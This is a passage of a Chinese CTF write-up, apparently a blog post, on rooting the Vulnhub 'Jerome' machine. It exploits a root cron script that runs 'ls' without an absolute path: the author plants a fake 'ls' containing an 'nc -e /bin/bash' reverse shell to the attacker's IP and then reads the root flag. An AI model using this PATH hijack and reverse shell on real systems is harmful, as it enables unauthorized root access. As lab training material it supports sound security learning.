2022-12-31 05:47:53 (306 MB/s) - 'linpeas.sh' saved [765823/765823]

jerome@jerome:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
jerome@jerome:/tmp$ ./linpeas.sh

输出结果中有下面的部分引起注意:

╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path                                         
/usr/bin/gettext.sh   

但没有收获。

jerome@jerome:/tmp$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot         root    /bin/bash /usr/share/simulate.sh
@reboot         root    dhclient
jerome@jerome:/tmp$ 

jerome@jerome:/tmp$ cat /usr/share/simulate.sh
cat /usr/share/simulate.sh
#
# This script simulates human behaviour from the root account
#

while true
do
    cd /home/jerome;
    ls;
    sleep 120;
done
jerome@jerome:/tmp$ ls -alh /usr/share/simulate.sh
ls -alh /usr/share/simulate.sh
-rwxr-xr-x 1 root root 130 Apr 16  2019 /usr/share/simulate.sh

由于simulate.sh脚本会执行一些命令,比如ls,而且不是绝对路径,因此可以生成我们自己的ls命令(也就是反向shell),然后追加到PATH变量中:

jerome@jerome:/home/jerome$ ls
ls
flag.txt
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 36K
drwxr-xr-x 4 jerome jerome 4.0K Dec 31 06:07 .
drwxr-xr-x 3 root   root   4.0K Apr 16  2019 ..
-rw------- 1 jerome jerome  531 Dec 31 06:07 .bash_history
-rw-r--r-- 1 jerome jerome  220 Apr 16  2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16  2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16  2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16  2019 .local
-rw-r--r-- 1 jerome jerome  807 Apr 16  2019 .profile
-rw-r--r-- 1 jerome jerome    0 Apr 16  2019 .sudo_as_admin_successful
-rw-r--r-- 1   1001   1001   12 Apr 12  2019 flag.txt
jerome@jerome:/home/jerome$ echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
jerome@jerome:/home/jerome$ chmod 777 
chmod 777
chmod: missing operand after '777'
Try 'chmod --help' for more information.
jerome@jerome:/home/jerome$ chmod 777 ls
chmod 777 ls
jerome@jerome:/home/jerome$ 
mp:$PATH

成功在kali linux得到root用户反弹回来的shell

┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 39892
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 36K
drwx------  3 root root 4.0K Apr 20  2019 .
drwxr-xr-x 22 root root 4.0K Mar 31  2019 ..
-rw-------  1 root root  607 Apr 20  2019 .bash_history
-rw-r--r--  1 root root 3.1K Apr 13  2019 .bashrc
-rw-------  1 root root   11 Apr 12  2019 flag.txt
drwxr-xr-x  3 root root 4.0K Mar 31  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   12 Apr 20  2019 .python_history
-rw-r--r--  1 root root   66 Apr  3  2019 .selected_editor
cat flag.txt
f60532cf8a

经验教训

  1. metasploit中对proxies的设置不是url,而是type:host:port, 中间没有//

  2. 当root权限的脚本中有执行命令,而且该命令不是绝对路径,可以通过生成同名的命令,其实是反弹shell的命令。

  3. metasploit中如果RHOSTS是本地,不要设置成localhost,而是127.0.0.1,。

标签:127.0,http,1.1,0.1,jerome,wordpress,Vulnhub,靶机,Jerome
From: https://www.cnblogs.com/jason-huawen/p/17016497.html

相关文章

  • vulnhub-SickOs1.1
    kali:192.168.56.109靶机:192.168.56.121信息收集nmap -f-Pn-A-O-p-192.168.56.122Notshown:65532filteredtcpports(no-response)PORTSTATESERVICE......
  • 文件上传漏洞靶机搭建教程
    uplad-labs靶场注意:该靶场为优秀的github开源项目,项目地址为:​​https://github.com/c0ny1/upload-labs​​介绍upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF......
  • Vulnhub之MinU V2靶机详细测试过程(提root权限时有些问题)
    MinU:V2识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/MinUv2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|......
  • vulnhub-SkyTower
    kali:192.168.56.109靶机:192.168.56.101nmap-A-O-p-192.168.56.101Notshown:65532closedtcpports(reset)PORTSTATESERVICEVERSION22/tcpfilt......
  • Vulnhub之Momentum靶机测试过程
    Momentum识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Momentum]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenV......
  • vulnhub-Stapler
    kali:192.168.56.109靶机:192.168.56.121nmap-sS-sV-O-T5-p-192.168.56.121Nmapscanreportfor192.168.56.121Hostisup(0.0020slatency).Notshown:65523......
  • vulnhub靶场之HACKABLE: III
    准备:攻击机:虚拟机kali、本机win10。靶机:Hackable:III,下载地址:https://download.vulnhub.com/hackable/hackable3.ova,下载后直接vbox打开即可。知识点:lxd提权、hydra爆......
  • Vulnhub之My CMSCMS靶机详细测试过程(采用不同的拿web shell的方法)
    MyCMSCMS作者:Jason_huawen靶机基本信息名称:MyCMSMS:1地址:识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/MyCMSCMS]└─$sudonetdiscover-ieth1Currentl......
  • vulnhub靶场之GROTESQUE: 3.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:Grotesque:3.0.1,下载地址:https://download.vulnhub.com/grotesque/grotesque3.zip,下载后直接vbox打开即可。知识点:ffuf参数爆破......
  • vulnhub-Tr0ll2
     Tr0ll:2~VulnHubwww.vulnhub.com/entry/tr0ll-2,107/kali192.168.56.109靶机192.168.56.120nmap-sS-A-O-p-192.168.56.120Nmapscanreportfor192.168......